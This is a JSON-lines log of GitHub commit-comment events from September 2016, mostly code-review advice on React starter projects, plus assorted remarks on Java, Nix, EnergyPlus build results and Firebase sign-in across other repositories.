{"id":"4544771227","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975098,"position":74,"line":73,"path":"ui/app.jsx","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:44:57Z","updated_at":"2016-09-10T21:44:57Z","body":"Rather than passing an anonymous function to map, usually I define the function and pass it in:\r\n\r\n    {this.state.results.map(this.renderItem))}"}},"created_at":"2016-09-10T21:44:57Z"}
{"id":"4544771809","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18975099,"position":null,"line":null,"path":null,"commit_id":"c6cf109ef9fabfc88cd363869c6f5a936524d90d","created_at":"2016-09-10T21:45:20Z","updated_at":"2016-09-10T21:45:20Z","body":"No. There was an error. I used %piecewise to help track down the error. I\ndid track down the error, then I fixed it. But I thought that I'd leave the\n%piecewise in case it could be used to track down errors in the future.\nNote that the %piecewise is converted to piecewise by the `value` in the\nlast line.\n\nI can either remove the %piecewise if you'd like, or put in a comment as to\nthe reason that it's there.\n\nOn Sat, Sep 10, 2016 at 3:39 PM, Jacques Carette <notifications@github.com>\nwrote:\n\n> So this is an error, and you'll fix it?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/c6cf109ef9fabfc88cd363869c6f5a936524d90d#commitcomment-18974782>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASYo9VU9uJsF2JsDOctqJHZcbKeh5Kcmks5qoweHgaJpZM4J5txv>\n> .\n>\n"}},"created_at":"2016-09-10T21:45:20Z"}
{"id":"4544772731","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Vardan27/AddressBookJDBC"},"payload":{"comment":{"id":18975100,"position":28,"line":28,"path":"src/main/java/am/aca/addressbook/repository/implementation/DbConnection.java","commit_id":"d6d01d9d454dbd3c938826f9acdf1776af68fcab","created_at":"2016-09-10T21:45:58Z","updated_at":"2016-09-10T21:45:58Z","body":"String USERNAME = \"root\";\r\nString PASSWORD = \"wwww\";\r\nString URL = \"jdbc:mysql://localhost:3306/AddressBook\";\r\nDB i es tvyalner@ petqa pahvi property file um\r\n"}},"created_at":"2016-09-10T21:45:58Z"}
{"id":"4544773167","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975102,"position":81,"line":80,"path":"ui/app.jsx","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:46:15Z","updated_at":"2016-09-10T21:46:15Z","body":"Clever use of a Modal here, but ultimately we'll want the result to be viewable on its own page (using React Router)."}},"created_at":"2016-09-10T21:46:15Z"}
{"id":"4544773235","type":"CommitCommentEvent","actor":{"login":"bardware"},"repo":{"name":"google/woff2"},"payload":{"comment":{"id":18975104,"position":5,"line":26,"path":"src/woff2_enc.cc","commit_id":"07cd303dd2959cbf69a6840706c0896e49e42677","created_at":"2016-09-10T21:46:18Z","updated_at":"2016-09-10T21:46:18Z","body":"where is compressor.h supposed to be located?"}},"created_at":"2016-09-10T21:46:18Z"}
{"id":"4544774168","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975105,"position":null,"line":null,"path":null,"commit_id":"a893c49b2d12958c632da18c6ff4f4f77880a9d7","created_at":"2016-09-10T21:46:58Z","updated_at":"2016-09-10T21:46:58Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-10T21:46:58Z"}
{"id":"4544775575","type":"CommitCommentEvent","actor":{"login":"fdaciuk"},"repo":{"name":"frontendbr/eventos"},"payload":{"comment":{"id":18975106,"position":null,"line":null,"path":null,"commit_id":"52202bdf1c8a23955df9627fb480095c59af1567","created_at":"2016-09-10T21:47:52Z","updated_at":"2016-09-10T21:47:52Z","body":":+1: "}},"created_at":"2016-09-10T21:47:52Z"}
{"id":"4544776342","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975108,"position":30,"line":30,"path":"ui/app.jsx","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:48:21Z","updated_at":"2016-09-10T21:48:21Z","body":"A convenient way to both define and bind functions in the same call is like this:\r\n\r\n    getMovie = (id) => {\r\n       getMovieById(id).then(movie => {\r\n         this.setState({\r\n           selected_movie: movie,\r\n           movie: true,\r\n         });\r\n       });\r\n     }"}},"created_at":"2016-09-10T21:48:21Z"}
{"id":"4544777610","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975111,"position":30,"line":30,"path":"ui/app.jsx","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:49:18Z","updated_at":"2016-09-10T21:49:18Z","body":"You should be dispatching an action for your saga to pick up here. `selected_movie` should not be set as `state`, but should instead be passed in via props (using `mapStateToProps`)."}},"created_at":"2016-09-10T21:49:18Z"}
{"id":"4544779133","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18975112,"position":null,"line":null,"path":null,"commit_id":"c6c96e9711e5f70ebd1fd166b18b790410f821c6","created_at":"2016-09-10T21:50:19Z","updated_at":"2016-09-10T21:50:19Z","body":"This kind of movement was enabled again after bomb testing where it would be useful.\r\nOn not so large regular maps in other GTs it needs better checks."}},"created_at":"2016-09-10T21:50:19Z"}
{"id":"4544779963","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18975113,"position":null,"line":null,"path":null,"commit_id":"767bc0da33ee06e76071230246b24e8ffb51236d","created_at":"2016-09-10T21:50:48Z","updated_at":"2016-09-10T21:50:48Z","body":"`npm run start-db` in a tab to get the mongo service started"}},"created_at":"2016-09-10T21:50:48Z"}
{"id":"4544780668","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Vardan27/AddressBookJDBC"},"payload":{"comment":{"id":18975114,"position":14,"line":14,"path":"src/main/java/am/aca/addressbook/repository/implementation/UserRepository.java","commit_id":"d6d01d9d454dbd3c938826f9acdf1776af68fcab","created_at":"2016-09-10T21:51:15Z","updated_at":"2016-09-10T21:51:15Z","body":"table i fielder i tvyalner@ constantaner en voronc karas static pahes\r\nprivate final String TABLE_USERS; ->\r\npublic static final String TABLE_USERS = \"users\";\r\n\r\n"}},"created_at":"2016-09-10T21:51:15Z"}
{"id":"4544781295","type":"CommitCommentEvent","actor":{"login":"mikeNG"},"repo":{"name":"msm7x30/android_hardware_qcom_display"},"payload":{"comment":{"id":18975116,"position":null,"line":null,"path":null,"commit_id":"beb3d408ff05d9748a8499f789941c7bde3b513a","created_at":"2016-09-10T21:51:37Z","updated_at":"2016-09-10T21:51:37Z","body":"@arco 3.4 still works with some kernel hacking https://github.com/LegacyXperia/android_kernel_semc_msm7x30/commit/257c44cbacb1247082af3d05aa4bc5fa4d5ba0f6 https://github.com/LegacyXperia/android_kernel_semc_msm7x30/commit/740514166c6a65ed4857c7dd25f918f299195020"}},"created_at":"2016-09-10T21:51:37Z"}
{"id":"4544781308","type":"CommitCommentEvent","actor":{"login":"Harmon758"},"repo":{"name":"Shizmob/pydle"},"payload":{"comment":{"id":18975117,"position":null,"line":null,"path":null,"commit_id":"311c723ef00595732791ebd07474bec0ee842dfc","created_at":"2016-09-10T21:51:38Z","updated_at":"2016-09-10T21:51:38Z","body":"Why was this reverted?"}},"created_at":"2016-09-10T21:51:38Z"}
{"id":"4544782296","type":"CommitCommentEvent","actor":{"login":"ugermann"},"repo":{"name":"ModernMT/MMT"},"payload":{"comment":{"id":18975119,"position":null,"line":null,"path":null,"commit_id":"d10e6c2e27a962d27162d16736abcee010002365","created_at":"2016-09-10T21:52:13Z","updated_at":"2016-09-10T21:52:13Z","body":"This version (probably earlier ones as well) is broken:\r\n[output.txt](https://github.com/ModernMT/MMT/files/465658/output.txt)\r\n"}},"created_at":"2016-09-10T21:52:13Z"}
{"id":"4544783519","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":18975121,"position":8,"line":27,"path":"package.json","commit_id":"2c33d63505a7f569704ffd29bf8dbd7778c9e762","created_at":"2016-09-10T21:52:58Z","updated_at":"2016-09-10T21:52:58Z","body":"Make sure you update the `webpack.vendor.js` file to include additional dependencies so that they won't be included in the bundle when you save a file. This will speed up your development time since it'll be faster to for webpack to write fewer lines of code."}},"created_at":"2016-09-10T21:52:58Z"}
{"id":"4544785303","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18975124,"position":null,"line":null,"path":null,"commit_id":"7e838ccb8837f972c6160538dd3ea2062f6d451e","created_at":"2016-09-10T21:54:04Z","updated_at":"2016-09-10T21:54:04Z","body":"commit is a bit all over the place, but mostly rm our db stuff from /server/express.js and also rm error rendered since we're not returning documents, only json"}},"created_at":"2016-09-10T21:54:04Z"}
{"id":"4544787294","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18975130,"position":7,"line":4,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-10T21:55:22Z","updated_at":"2016-09-10T21:55:22Z","body":"Typically you differentiate constants by naming them in all caps, ie: `API`."}},"created_at":"2016-09-10T21:55:22Z"}
{"id":"4544787831","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18975133,"position":null,"line":null,"path":null,"commit_id":"f86c6060da0e55e9fafc7c79786805612532fd9f","created_at":"2016-09-10T21:55:42Z","updated_at":"2016-09-10T21:55:42Z","body":"create a real model & expose its methods so they can be called from our controller (or from our fetcher)"}},"created_at":"2016-09-10T21:55:42Z"}
{"id":"4544788698","type":"CommitCommentEvent","actor":{"login":"ctsstc"},"repo":{"name":"g5codyswartz/LikeAG5"},"payload":{"comment":{"id":18975136,"position":null,"line":null,"path":null,"commit_id":"0e72611be8dbbb8170ec6d5a2ff1152e8efad4eb","created_at":"2016-09-10T21:56:16Z","updated_at":"2016-09-10T21:56:16Z","body":"I believe this was added so that the pop-up could talk to the current window/background for things such as buttons toggling functions or pulling in information about the current page."}},"created_at":"2016-09-10T21:56:16Z"}
{"id":"4544789963","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18975139,"position":null,"line":null,"path":null,"commit_id":"c53e96ac5d036a5d0d88bcfad64f52a3bc0deeaf","created_at":"2016-09-10T21:57:09Z","updated_at":"2016-09-10T21:57:09Z","body":"this is required from init.js and poll the airtime server every n seconds. kinda the barebone version of a non-locking worker but should do for now"}},"created_at":"2016-09-10T21:57:09Z"}
{"id":"4544792150","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18975140,"position":44,"line":33,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-10T21:57:39Z","updated_at":"2016-09-10T21:57:39Z","body":"You should write this function such that you don't have to bind the function in the constructor:\r\n\r\n    handleChange = (event) => {\r\n      this.setState({ keyword: event.target.value });\r\n    }\r\n\r\ninstead of\r\n\r\n    this.handleChange = this.handleChange.bind(this);"}},"created_at":"2016-09-10T21:57:39Z"}
{"id":"4544792551","type":"CommitCommentEvent","actor":{"login":"ktbyers"},"repo":{"name":"napalm-automation/napalm-ios"},"payload":{"comment":{"id":18975141,"position":null,"line":null,"path":null,"commit_id":"8f9726d6d4344697e61916166b1c1da253f76e46","created_at":"2016-09-10T21:57:59Z","updated_at":"2016-09-10T21:57:59Z","body":"Why is netaddr listed as a requirement for cisco-ios...it is not used?"}},"created_at":"2016-09-10T21:57:59Z"}
{"id":"4544792602","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18975142,"position":45,"line":34,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-10T21:58:01Z","updated_at":"2016-09-10T21:58:01Z","body":"typo"}},"created_at":"2016-09-10T21:58:01Z"}
{"id":"4544793368","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18975144,"position":null,"line":null,"path":null,"commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-10T21:58:36Z","updated_at":"2016-09-10T21:58:36Z","body":"Please turn eslint on."}},"created_at":"2016-09-10T21:58:36Z"}
{"id":"4544794697","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18975150,"position":null,"line":null,"path":null,"commit_id":"d688bf611ad82b754c4b57e40d412516b4be64da","created_at":"2016-09-10T21:59:36Z","updated_at":"2016-09-10T21:59:36Z","body":"Why should these deps be propagated?"}},"created_at":"2016-09-10T21:59:36Z"}
{"id":"4544795960","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18975154,"position":null,"line":null,"path":null,"commit_id":"c53e96ac5d036a5d0d88bcfad64f52a3bc0deeaf","created_at":"2016-09-10T22:00:20Z","updated_at":"2016-09-10T22:00:20Z","body":"upgrade is https://github.com/rvagg/node-worker-farm"}},"created_at":"2016-09-10T22:00:20Z"}
{"id":"4544796820","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975155,"position":null,"line":null,"path":null,"commit_id":"0cf6d8032c673c1df2780c682ea1b4dc1ab36c24","created_at":"2016-09-10T22:00:49Z","updated_at":"2016-09-10T22:00:49Z","body":"this is a bold and simple move. but i think it works quite well basically for all cases. take note"}},"created_at":"2016-09-10T22:00:49Z"}
{"id":"4544797926","type":"CommitCommentEvent","actor":{"login":"SKA4"},"repo":{"name":"supasuma/chitter-challenge"},"payload":{"comment":{"id":18975159,"position":null,"line":null,"path":null,"commit_id":"0341cbe02762b25d0d9de6d6a01be7610f96a7bc","created_at":"2016-09-10T22:01:35Z","updated_at":"2016-09-10T22:01:35Z","body":"I feel you."}},"created_at":"2016-09-10T22:01:35Z"}
{"id":"4544798215","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18975160,"position":null,"line":null,"path":null,"commit_id":"bcd9b5196088f6d3422787348784a620c4ff3801","created_at":"2016-09-10T22:01:49Z","updated_at":"2016-09-10T22:01:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BuGMLYDD&#x2F;10-ft-009-permanent-connection-to-db\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [FT-009] Permanent connection to db</a>"}},"created_at":"2016-09-10T22:01:49Z"}
{"id":"4544798407","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18975161,"position":null,"line":null,"path":null,"commit_id":"7e838ccb8837f972c6160538dd3ea2062f6d451e","created_at":"2016-09-10T22:01:57Z","updated_at":"2016-09-10T22:01:57Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BuGMLYDD&#x2F;10-ft-009-permanent-connection-to-db\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [FT-009] Permanent connection to db</a>"}},"created_at":"2016-09-10T22:01:57Z"}
{"id":"4544800342","type":"CommitCommentEvent","actor":{"login":"dubhater"},"repo":{"name":"vapoursynth/vapoursynth"},"payload":{"comment":{"id":18975166,"position":30,"line":2073,"path":"src/core/simplefilters.c","commit_id":"df42dcb27b95e01fff5c693ffbe6a921fcdc0dd6","created_at":"2016-09-10T22:03:04Z","updated_at":"2016-09-10T22:03:04Z","body":"Shift left by 16 bits? Not 8?"}},"created_at":"2016-09-10T22:03:04Z"}
{"id":"4544801068","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18975169,"position":53,"line":42,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-10T22:03:36Z","updated_at":"2016-09-10T22:03:36Z","body":"There are a couple changes I would make to how you wrote your function:\r\n\r\n    renderResult = (item, i) => (\r\n      <button key={i}>{item.Title}</button>\r\n    );\r\n\r\n    renderResults() {\r\n      if (!this.state.displayResults) return null;\r\n      return this.state.query.map(this.renderResult);\r\n    }\r\n\r\nFirst, rather than wrapping your entire function body in an `if` statement, just exit early. Next, it's generally bad practice to use anonymous functions in a map because they create a closure (which is sometimes useful, but in this case unnecessary)."}},"created_at":"2016-09-10T22:03:36Z"}
{"id":"4544801441","type":"CommitCommentEvent","actor":{"login":"bk79"},"repo":{"name":"iNavFlight/inav"},"payload":{"comment":{"id":18975170,"position":null,"line":null,"path":null,"commit_id":"79cf530b97960d9138646744b5d29d6ac00729e7","created_at":"2016-09-10T22:03:51Z","updated_at":"2016-09-10T22:03:51Z","body":"@DzikuVx building works, telemetry works except temperature (from gyro) which gives 0 I'll try to investigate, "}},"created_at":"2016-09-10T22:03:51Z"}
{"id":"4544801985","type":"CommitCommentEvent","actor":{"login":"20-25"},"repo":{"name":"20-25/hello-world"},"payload":{"comment":{"id":18975171,"position":null,"line":null,"path":null,"commit_id":"81474fcabbecec337b155becc673ae8ff760f1c4","created_at":"2016-09-10T22:04:15Z","updated_at":"2016-09-10T22:04:15Z","body":"videogames"}},"created_at":"2016-09-10T22:04:15Z"}
{"id":"4544802231","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18975172,"position":null,"line":null,"path":null,"commit_id":"a3bcdc1ee0fea9b7d39e874f373ae450adcdaf86","created_at":"2016-09-10T22:04:25Z","updated_at":"2016-09-10T22:04:25Z","body":"What are the benefits of using these two deps as externals? Isn't it mostly adding more moving parts and making maintenance slightly more difficult?"}},"created_at":"2016-09-10T22:04:25Z"}
{"id":"4544803065","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18975173,"position":67,"line":53,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-10T22:05:01Z","updated_at":"2016-09-10T22:05:01Z","body":"Rather than wrapping your attributes onto multiple lines, you can do something like this:\r\n\r\n    function renderInput() {\r\n      const props = {\r\n        type: 'text',\r\n        ref: 'textinput',\r\n        placeholder: 'Title Here',\r\n        value: this.state.keyword,\r\n        onChange: this.handleChange,\r\n      };\r\n    }\r\n\r\nThen, you can replace this whole element with:\r\n\r\n    {this.renderInput()}"}},"created_at":"2016-09-10T22:05:01Z"}
{"id":"4544803275","type":"CommitCommentEvent","actor":{"login":"dev-4"},"repo":{"name":"Smoreley/collab-w1-d4"},"payload":{"comment":{"id":18975175,"position":null,"line":null,"path":null,"commit_id":"30bdd6672cd20822f12f5337d85a1cfa0b205729","created_at":"2016-09-10T22:05:11Z","updated_at":"2016-09-10T22:05:11Z","body":"I changed the background's width to match the window size (if the video doesn't load it's going to show the background)"}},"created_at":"2016-09-10T22:05:11Z"}
{"id":"4544804587","type":"CommitCommentEvent","actor":{"login":"susmitasomanchi"},"repo":{"name":"susmitasomanchi/mod2-assg"},"payload":{"comment":{"id":18975179,"position":null,"line":null,"path":null,"commit_id":"4e3b45d088322105627716469e0692f4c9d00986","created_at":"2016-09-10T22:06:06Z","updated_at":"2016-09-10T22:06:06Z","body":"Updated style.css"}},"created_at":"2016-09-10T22:06:06Z"}
{"id":"4544806024","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975183,"position":null,"line":null,"path":null,"commit_id":"0cf6d8032c673c1df2780c682ea1b4dc1ab36c24","created_at":"2016-09-10T22:07:07Z","updated_at":"2016-09-10T22:07:07Z","body":"As long as `losetup -f` works then I'm ok with it. :smile_cat: "}},"created_at":"2016-09-10T22:07:07Z"}
{"id":"4544807202","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18975184,"position":null,"line":null,"path":null,"commit_id":"0bef3e4433f697d0468a378e716e9c4c0bd286af","created_at":"2016-09-10T22:07:54Z","updated_at":"2016-09-10T22:07:54Z","body":"Is it not weird that we have header and then .header ?"}},"created_at":"2016-09-10T22:07:54Z"}
{"id":"4544807737","type":"CommitCommentEvent","actor":{"login":"gl3-price"},"repo":{"name":"gl3-price/hello-world"},"payload":{"comment":{"id":18975185,"position":2,"line":2,"path":"README.md","commit_id":"8b6e8a7ef6311a9c3e294217767fbf71d339da23","created_at":"2016-09-10T22:08:14Z","updated_at":"2016-09-10T22:08:14Z","body":"have no idea\r\n"}},"created_at":"2016-09-10T22:08:14Z"}
{"id":"4544808899","type":"CommitCommentEvent","actor":{"login":"gl3-price"},"repo":{"name":"gl3-price/hello-world"},"payload":{"comment":{"id":18975189,"position":null,"line":null,"path":null,"commit_id":"8b6e8a7ef6311a9c3e294217767fbf71d339da23","created_at":"2016-09-10T22:09:00Z","updated_at":"2016-09-10T22:09:00Z","body":"no idea"}},"created_at":"2016-09-10T22:09:00Z"}
{"id":"4544809153","type":"CommitCommentEvent","actor":{"login":"gl3-price"},"repo":{"name":"gl3-price/hello-world"},"payload":{"comment":{"id":18975190,"position":null,"line":null,"path":null,"commit_id":"8b6e8a7ef6311a9c3e294217767fbf71d339da23","created_at":"2016-09-10T22:09:12Z","updated_at":"2016-09-10T22:09:12Z","body":"what I'm doing"}},"created_at":"2016-09-10T22:09:12Z"}
{"id":"4544816078","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18975196,"position":41,"line":30,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-10T22:14:26Z","updated_at":"2016-09-10T22:14:26Z","body":"I'm assuming this is just a proof of concept, but just to comment on it quick:\r\n\r\nI'm not sure you need a state variable for display results. In my eyes, you leverage the different values in the variable `state.query` like so:\r\n\r\n    null // Don't display either because the data is loading or you're waiting on use input\r\n    [] // No results\r\n    [{...}, ...] // Results\r\n\r\nThen your render function might look like this (not sure why we're calling the state variable `query` but I'll go along with it):\r\n\r\n    render() {\r\n      if (!this.state.query) return null;\r\n      if (!this.state.query.length) return <div>No results</div>;\r\n      return this.state.query.map(this.renderItem);\r\n    }"}},"created_at":"2016-09-10T22:14:26Z"}
{"id":"4544817312","type":"CommitCommentEvent","actor":{"login":"lilaspourpre"},"repo":{"name":"lilaspourpre/exploration_of_news"},"payload":{"comment":{"id":18975197,"position":15,"line":15,"path":"article_parser.py","commit_id":"c4b0455cd283e9e5dfc3b49a8b37a00d25633abd","created_at":"2016-09-10T22:15:23Z","updated_at":"2016-09-10T22:15:23Z","body":"не сделала, потому что сюда незнакомый язык вообще не дойдет, там раньше оно есть"}},"created_at":"2016-09-10T22:15:23Z"}
{"id":"4544819289","type":"CommitCommentEvent","actor":{"login":"Jusonex"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":18975198,"position":null,"line":null,"path":null,"commit_id":"f26bb8e1a26421ce1ea29def211682c295d37d00","created_at":"2016-09-10T22:16:45Z","updated_at":"2016-09-10T22:16:45Z","body":"toolset*"}},"created_at":"2016-09-10T22:16:45Z"}
{"id":"4544819632","type":"CommitCommentEvent","actor":{"login":"flavvita"},"repo":{"name":"Wictor13/Bibliotec"},"payload":{"comment":{"id":18975199,"position":null,"line":null,"path":null,"commit_id":"570945331787cb672f45da624f28318a61a0f3a3","created_at":"2016-09-10T22:16:58Z","updated_at":"2016-09-10T22:16:58Z","body":"Agora é a hora de deixar cidades mais conectadas.\r\nUma das coisas mais importantes é incentivar as pessoas a usarem a biblioteca, pois uma biblioteca sem pessoas é apenas um depósito de livros...\r\nvejam esse link => https://isjavado.wordpress.com/2012/03/16/como-criar-minha-propria-biblioteca-em-java/"}},"created_at":"2016-09-10T22:16:58Z"}
{"id":"4544819877","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18975200,"position":null,"line":null,"path":null,"commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-10T22:17:10Z","updated_at":"2016-09-10T22:17:10Z","body":"Did you notice that your commit has the `.DS_Store` file in it? You can tell `git` to ignore these files by adding `.DS_Store` to your `.gitignore` file. That will prevent _new_ files from being added, but you'll still need to remove the old files using `git rm .DS_Store` and `git rm ui/.DS_Store`."}},"created_at":"2016-09-10T22:17:10Z"}
{"id":"4544821151","type":"CommitCommentEvent","actor":{"login":"tomtom215"},"repo":{"name":"firebase/friendlypix"},"payload":{"comment":{"id":18975202,"position":null,"line":null,"path":null,"commit_id":"773cc2f6d067556b84df61d6465e3df2947e1250","created_at":"2016-09-10T22:18:05Z","updated_at":"2016-09-10T22:18:05Z","body":"I know that the \"pop-up\" sign in method is documented in the firebaseui web doc's; however after updating my app to use the \"pop-up\" method, I found it became a lot more of a pain to use do to the wide-spread use of browser-add blockers. \r\n\r\nOn Mobile, iOS (safari-popup blockers enabled in settings) - major issues with the app routing from the to an :onlyauthed page with popup method is used - (I have my app routed a tad different, see below, to force's users to log in upfront and send them to their user page and my app is frozen at the splash page for most users with no way to trigger the log in.)\r\n\r\nI feel this change introduces  major issues with the Auth Ui to work to work universally across users/browsers for the friendly-pix PWA web-app demo\r\n\r\nHere's a snippet of my in routes.js for context (I definitely have bugs in my routes as is, however the pop-up method has definitely caused a lot more issues since this commit):\r\n\r\n        // Configuring routes.\r\n        const pipe = friendlyPix.Router.pipe;\r\n        const displayPage = this.displayPage.bind(this);\r\n        const loadUser = userId => friendlyPix.userPage.loadUser(userId);\r\n        const showHomeFeed = () => friendlyPix.feed.showHomeFeed();\r\n        const showGeneralFeed = () => friendlyPix.feed.showGeneralFeed();\r\n        const clearFeed = () => friendlyPix.feed.clear();\r\n        const showPost = postId => friendlyPix.post.loadPost(postId);\r\n\r\n        page('/', pipe(showHomeFeed, null, true),\r\n            pipe(displayPage, {pageId: 'user-info', onlyAuthed: true}));\r\n        page('/feed', pipe(showGeneralFeed, null, true), pipe(displayPage, {pageId: 'feed', onlyAuthed: true})); //only display feed if authed\r\n        page('/post/:postId', pipe(showPost, null, true), pipe(displayPage, {pageId: 'post'}));\r\n        page('/user/:userId', pipe(loadUser, null, true), pipe(displayPage, {pageId: 'user-info'}));\r\n        page('/about', pipe(clearFeed, null, true), pipe(displayPage, {pageId: 'about'}));\r\n        page('/add', pipe(displayPage, {pageId: 'add', onlyAuthed: true}));\r\n        page('*', () => page('/'));"}},"created_at":"2016-09-10T22:18:05Z"}
{"id":"4544821687","type":"CommitCommentEvent","actor":{"login":"keshavbhatt"},"repo":{"name":"keshavbhatt/snapcraft-gui"},"payload":{"comment":{"id":18975205,"position":null,"line":null,"path":null,"commit_id":"3c5cd338cc72803676c860e198dac8fff382f069","created_at":"2016-09-10T22:18:29Z","updated_at":"2016-09-10T22:18:29Z","body":"wow"}},"created_at":"2016-09-10T22:18:29Z"}
{"id":"4544822966","type":"CommitCommentEvent","actor":{"login":"gl3-price"},"repo":{"name":"gl3-price/hello-world"},"payload":{"comment":{"id":18975206,"position":2,"line":2,"path":"README.md","commit_id":"8b6e8a7ef6311a9c3e294217767fbf71d339da23","created_at":"2016-09-10T22:19:31Z","updated_at":"2016-09-10T22:19:31Z","body":"+helpppp"}},"created_at":"2016-09-10T22:19:31Z"}
